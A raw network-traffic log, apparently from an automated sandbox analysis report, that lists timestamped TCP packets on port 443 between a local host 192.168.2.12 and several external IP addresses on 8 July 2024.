                            Jul 8, 2024 10:09:30.530715942 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.530720949 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.530862093 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.578903913 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.578929901 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.579005957 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.579011917 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.579034090 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.579130888 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.619477987 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.619499922 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.619563103 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.619570971 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.619606972 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.619625092 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.621428967 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.621445894 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.621522903 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.621529102 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.621587038 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.622128010 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.622150898 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.622226954 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.622232914 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.622275114 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.623934984 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.623951912 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.624048948 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.624053955 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.624182940 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.625241041 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.625263929 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.625351906 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.625359058 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.625394106 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.625411034 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.625756979 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.625771999 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.625825882 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.625830889 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.625868082 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.625910044 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.626761913 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.626777887 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.626831055 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.626836061 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.627145052 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.674926043 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.674952984 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.675024986 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.675033092 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.675076008 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.675076008 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.716356039 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.716372967 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.716495991 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.716495991 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.716502905 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.716588020 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.717878103 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.717897892 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.717978001 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.717978001 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.717983007 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.718113899 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.718936920 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.718951941 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.719048023 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.719053984 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.719196081 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.720170021 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.720185041 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.720252991 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.720257998 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.720320940 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.721312046 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.721329927 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.721374989 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.721379042 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.721417904 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.721417904 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.722184896 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.722199917 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.722280025 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.722280025 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.722285032 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.722361088 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.723227024 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.723242998 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.723351955 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.723351955 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.723360062 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.723473072 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.755773067 CEST49733443192.168.2.12184.28.90.27
                            Jul 8, 2024 10:09:30.755810022 CEST44349733184.28.90.27192.168.2.12
                            Jul 8, 2024 10:09:30.755873919 CEST49733443192.168.2.12184.28.90.27
                            Jul 8, 2024 10:09:30.756835938 CEST49733443192.168.2.12184.28.90.27
                            Jul 8, 2024 10:09:30.756850004 CEST44349733184.28.90.27192.168.2.12
                            Jul 8, 2024 10:09:30.770715952 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.770735025 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.770797014 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.770802975 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.770834923 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.770847082 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.811887026 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.811904907 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.812007904 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.812014103 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.812031984 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.812112093 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.813823938 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.813839912 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.813957930 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.813965082 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.814075947 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.814729929 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.814752102 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.814826012 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.814832926 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.814979076 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.817264080 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.817284107 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.817352057 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.817359924 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.817431927 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.817464113 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.817480087 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.817542076 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.817553043 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.817601919 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.817825079 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.817845106 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.817905903 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.817910910 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.817931890 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.817965031 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.818826914 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.818844080 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.818907022 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.818913937 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.818962097 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.866478920 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.866503000 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.866561890 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.866569042 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.866606951 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.866811991 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.898688078 CEST44349732216.58.212.132192.168.2.12
                            Jul 8, 2024 10:09:30.899097919 CEST49732443192.168.2.12216.58.212.132
                            Jul 8, 2024 10:09:30.899133921 CEST44349732216.58.212.132192.168.2.12
                            Jul 8, 2024 10:09:30.900218964 CEST44349732216.58.212.132192.168.2.12
                            Jul 8, 2024 10:09:30.900279999 CEST49732443192.168.2.12216.58.212.132
                            Jul 8, 2024 10:09:30.901246071 CEST49732443192.168.2.12216.58.212.132
                            Jul 8, 2024 10:09:30.901313066 CEST44349732216.58.212.132192.168.2.12
                            Jul 8, 2024 10:09:30.907259941 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.907284975 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.907349110 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.907356977 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.907381058 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.907468081 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.909260035 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.909279108 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.909333944 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.909342051 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.909372091 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.909442902 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.910581112 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.910600901 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.910718918 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.910723925 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.910779953 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.912101984 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.912130117 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.912203074 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.912203074 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.912210941 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.912338018 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.913081884 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.913101912 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.913223028 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.913228989 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.913306952 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.914203882 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.914227009 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.914283037 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.914287090 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.914323092 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.914336920 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.915221930 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.915239096 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.915297985 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.915302992 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:30.915389061 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:30.947493076 CEST49732443192.168.2.12216.58.212.132
                            Jul 8, 2024 10:09:30.947527885 CEST44349732216.58.212.132192.168.2.12
                            Jul 8, 2024 10:09:30.995780945 CEST49732443192.168.2.12216.58.212.132
                            Jul 8, 2024 10:09:31.001045942 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:31.001070023 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:31.001228094 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:31.001238108 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:31.003774881 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:31.003798008 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:31.003874063 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:31.003880978 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:31.005083084 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:31.005266905 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:31.005281925 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:31.005356073 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:31.005361080 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:31.005841970 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:31.007308960 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:31.007325888 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:31.007395983 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:31.007400990 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:31.007536888 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:31.008244991 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:31.008260012 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:31.008316040 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:31.008322001 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:31.008362055 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:31.008362055 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:31.008871078 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:31.008887053 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:31.008955956 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:31.008960962 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:31.009028912 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:31.009845972 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:31.009862900 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:31.009938955 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:31.009944916 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:31.010065079 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:31.010684013 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:31.010708094 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:31.010797024 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:31.010801077 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:31.010890007 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:31.097182035 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:31.097208023 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:31.097301006 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:31.097309113 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:31.097390890 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:31.099581957 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:31.099598885 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:31.099661112 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:31.099667072 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:31.099899054 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:31.100821018 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:31.100840092 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:31.100891113 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:31.100897074 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:31.100920916 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:31.100938082 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:31.103856087 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:31.103874922 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:31.103940010 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:31.103945017 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:31.104094028 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:31.104798079 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:31.104816914 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:31.104872942 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:31.104878902 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:31.105040073 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:31.105740070 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:31.105757952 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:31.105814934 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:31.105822086 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:31.105861902 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:31.105861902 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:31.106991053 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:31.107007980 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:31.107075930 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:31.107080936 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:31.107100010 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:31.107115984 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:31.107372999 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:31.107388973 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:31.107445955 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:31.107450962 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:31.107486963 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:31.107486963 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:31.192646027 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:31.192671061 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:31.192744970 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:31.192750931 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:31.192800999 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:31.195280075 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:31.195297956 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:31.195357084 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:31.195363045 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:31.195389986 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:31.195405006 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:31.196274996 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:31.196291924 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:31.196372032 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:31.196372032 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:31.196382046 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:31.196440935 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:31.199393034 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:31.199409008 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:31.199497938 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:31.199497938 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:31.199503899 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:31.199553967 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:31.200340986 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:31.200359106 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:31.200448990 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:31.200453997 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:31.200628996 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:31.201350927 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:31.201369047 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:31.201433897 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:31.201438904 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:31.201487064 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:31.202430964 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:31.202447891 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:31.202517986 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:31.202524900 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:31.202630997 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:31.202727079 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:31.202744007 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:31.202783108 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:31.202788115 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:31.202826023 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:31.202826023 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:31.288399935 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:31.288422108 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:31.288476944 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:31.288490057 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:31.288522005 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:31.288541079 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:31.291496038 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:31.291513920 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:31.291568041 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:31.291574001 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:31.291620970 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:31.292025089 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:31.292045116 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:31.292093039 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:31.292098045 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:31.292145014 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:31.295173883 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:31.295190096 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:31.295233011 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:31.295239925 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:31.295274973 CEST49713443192.168.2.1252.216.42.97
                            Jul 8, 2024 10:09:31.297336102 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:31.297353029 CEST4434971352.216.42.97192.168.2.12
                            Jul 8, 2024 10:09:31.297406912 CEST49713443192.168.2.1252.216.42.97
